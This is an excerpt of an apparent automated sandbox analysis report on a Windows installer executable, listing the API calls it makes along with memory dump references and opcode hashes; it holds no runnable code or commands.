                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: e9cc2bfb6666a38da3f8af72fc6e4fa1e7a90b5ce2f039f92a7749c1dc8846cd
                                                                      • Instruction ID: dd78d0217ab0626d0a7a3bfb5b7a36ba0d54d57a697f982decce5ead7147db90
                                                                      • Opcode Fuzzy Hash: e9cc2bfb6666a38da3f8af72fc6e4fa1e7a90b5ce2f039f92a7749c1dc8846cd
                                                                      • Instruction Fuzzy Hash: 64D0C766704114E7C602D6AD9A4559D639497D5355B304033E102B51E1D1BC460266DF
                                                                      APIs
                                                                      • SendMessageA.USER32(000103F2,00000000,00000000,00000000), ref: 004040D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
                                                                      • Instruction ID: 4e90d0d88409270038b8e5dd21ed965c243834f72d7675745fce4010ef402404
                                                                      • Opcode Fuzzy Hash: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
                                                                      • Instruction Fuzzy Hash: 90C09B717407017BFA20CB689D49F077794AB90700F14C4297351F50E5C674D410DA1C
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,00042BE4), ref: 0040320E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                                      • Instruction ID: 81fdcbbc46e9ac73494c3809a02cbb86869920566b24394b282a4516d046c7b0
                                                                      • Opcode Fuzzy Hash: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                                      • Instruction Fuzzy Hash: 32B01231140300BFDA214F00DF09F057B21AB90700F10C034B384780F086711075EB0D
                                                                      APIs
                                                                      • SendMessageA.USER32(00000028,?,?,00403EE0), ref: 004040BE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
                                                                      • Instruction ID: f42b45c65ed6a3ee6e87ec929b41dfaaf359f69b17cd9f6c2b1881eba3545dd7
                                                                      • Opcode Fuzzy Hash: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
                                                                      • Instruction Fuzzy Hash: 64B09235180A00AAEA114B00DE09F457A62A7A4701F008068B250240F1CAB200A1DB08
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403E79), ref: 004040A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: bf910cdad2a26b56ee3b85a0ed98412bb2a8b11df0198d0adf4484009f2821d5
                                                                      • Instruction ID: 939548ffee5b58c9ca03ae204caad8327118cb5bb39276deea9dcfc8bbd505dc
                                                                      • Opcode Fuzzy Hash: bf910cdad2a26b56ee3b85a0ed98412bb2a8b11df0198d0adf4484009f2821d5
                                                                      • Instruction Fuzzy Hash: 65A00176444101AFCA02AF50EF09D4ABF62ABA4705B22843AE695940368A364872FF1D
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 70022AF7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1895783302.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                      • Associated: 00000000.00000002.1895725058.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895885805.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895913966.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_70020000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 98ccfd1f61e53e26ccdfccc5b97b95d4a9007ade02fe2b514d1ebcd62e4f34d2
                                                                      • Instruction ID: d21092361dcdf761e70d0b83bb978fab9b63b28275ca11d3d3588a519f030466
                                                                      • Opcode Fuzzy Hash: 98ccfd1f61e53e26ccdfccc5b97b95d4a9007ade02fe2b514d1ebcd62e4f34d2
                                                                      • Instruction Fuzzy Hash: F2413B73900204BFEB21DFF5FC82B5D7BB5EB04B36F30452AE60586162C774A8C28A65
                                                                      APIs
                                                                        • Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                        • Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                        • Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0), ref: 00405170
                                                                        • Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll), ref: 00405182
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                        • Part of subcall function 0040568C: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D50,Error launching installer), ref: 004056B5
                                                                        • Part of subcall function 0040568C: CloseHandle.KERNEL32(?), ref: 004056C2
                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00401F8D
                                                                        • Part of subcall function 004063FA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F43,?,?,?,?,?,?), ref: 0040640B
                                                                        • Part of subcall function 004063FA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040642D
                                                                        • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2972824698-0
                                                                      • Opcode ID: ab329a5fbe1a2bb80e6d7f0c1e62c441a25b0281b2f032684fa4d7b26fa7afa5
                                                                      • Instruction ID: 492013b03639ae684c90f9e5668eb43d68f0c3151a551265a361b9bf3657de6d
                                                                      • Opcode Fuzzy Hash: ab329a5fbe1a2bb80e6d7f0c1e62c441a25b0281b2f032684fa4d7b26fa7afa5
                                                                      • Instruction Fuzzy Hash: 44F09072A04111EBCF11BBA59A859EE72A8DB41318F11017FF901B72D2C37C4A429AAE
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 4a6513538906c2ad888d603f4eec974da145158fa5c322b66a4fc234cd88381b
                                                                      • Instruction ID: 58a32f90f567def110640d9dc390567cb18a6fab0a7cd362fc6929561968ffa9
                                                                      • Opcode Fuzzy Hash: 4a6513538906c2ad888d603f4eec974da145158fa5c322b66a4fc234cd88381b
                                                                      • Instruction Fuzzy Hash: D3D05E73A10201CBD701EBB8AE8485E73B8E7513157204837D542F2191E6B8C9428628
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040455C
                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404586
                                                                      • SHBrowseForFolderA.SHELL32(?,0079E920,?), ref: 00404637
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404642
                                                                      • lstrcmpiA.KERNEL32(Call,0079F548), ref: 00404674
                                                                      • lstrcatA.KERNEL32(?,Call), ref: 00404680
                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404692
                                                                        • Part of subcall function 004056ED: GetDlgItemTextA.USER32(?,?,00000400,004046C9), ref: 00405700
                                                                        • Part of subcall function 00406257: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\sgJV11UlDP.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                        • Part of subcall function 00406257: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                        • Part of subcall function 00406257: CharNextA.USER32(?,"C:\Users\user\Desktop\sgJV11UlDP.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                        • Part of subcall function 00406257: CharPrevA.USER32(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                      • GetDiskFreeSpaceA.KERNEL32(0079E518,?,?,0000040F,?,0079E518,0079E518,?,?,0079E518,?,?,000003FB,?), ref: 00404750
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040476B
                                                                        • Part of subcall function 004048C4: lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                        • Part of subcall function 004048C4: wsprintfA.USER32 ref: 0040496A
                                                                        • Part of subcall function 004048C4: SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A$C:\Users\user\AppData\Local\Temp\unscorified$Call
                                                                      • API String ID: 2624150263-2479648482
                                                                      • Opcode ID: 426c689e6bfd3f7724a5f807d599469a9c9a79d675bf4b1419e56df68b0f1dd0
                                                                      • Instruction ID: c53a8e09cffb511e2e8442f8e0ee4109053d5ca2156788ad792cf5210b9728ca
                                                                      • Opcode Fuzzy Hash: 426c689e6bfd3f7724a5f807d599469a9c9a79d675bf4b1419e56df68b0f1dd0
                                                                      • Instruction Fuzzy Hash: F4A17FB1900209ABDB11AFA5CD45AAFB7B8EF85314F14843BF601B62D1D77C8A418F69
                                                                      APIs
                                                                        • Part of subcall function 70021215: GlobalAlloc.KERNEL32(00000040,70021233,?,700212CF,-7002404B,700211AB,-000000A0), ref: 7002121D
                                                                      • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 70021BC4
                                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 70021C0C
                                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 70021C16
                                                                      • GlobalFree.KERNEL32(00000000), ref: 70021C29
                                                                      • GlobalFree.KERNEL32(?), ref: 70021D09
                                                                      • GlobalFree.KERNEL32(?), ref: 70021D0E
                                                                      • GlobalFree.KERNEL32(?), ref: 70021D13
                                                                      • GlobalFree.KERNEL32(00000000), ref: 70021EFA
                                                                      • lstrcpyA.KERNEL32(?,?), ref: 70022098
                                                                      • GetModuleHandleA.KERNEL32(00000008), ref: 70022114
                                                                      • LoadLibraryA.KERNEL32(00000008), ref: 70022125
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 7002217E
                                                                      • lstrlenA.KERNEL32(00000408), ref: 70022198
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1895783302.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                      • Associated: 00000000.00000002.1895725058.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895885805.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895913966.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_70020000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                      • String ID:
                                                                      • API String ID: 245916457-0
                                                                      • Opcode ID: ab50ab7eda5e10dc1bf96abc62e307ee394e6c38eaafddfd1b9488961c6addbf
                                                                      • Instruction ID: 6cede08fee887c9c7b3d593f8c330f8c42695dc319edb34ecc5b52c1f8c2ad60
                                                                      • Opcode Fuzzy Hash: ab50ab7eda5e10dc1bf96abc62e307ee394e6c38eaafddfd1b9488961c6addbf
                                                                      • Instruction Fuzzy Hash: 9A22A071D04209EFDB228FB4ED847EDBBFAFB14B26F20452ED196A2281D7745941CB50
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(00408410,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens, xrefs: 004021FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens
                                                                      • API String ID: 123533781-74183469
                                                                      • Opcode ID: 8c1491b70ee9da71462547a4ad139fcbd62dd758efc4c42bbf0e79f38f17cd9a
                                                                      • Instruction ID: b20e6ddc0005349e031541e3270fed9150ef90c2934288fc693311ea7f84ec63
                                                                      • Opcode Fuzzy Hash: 8c1491b70ee9da71462547a4ad139fcbd62dd758efc4c42bbf0e79f38f17cd9a
                                                                      • Instruction Fuzzy Hash: 1F511871A00209AFCF00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54
                                                                      APIs
                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
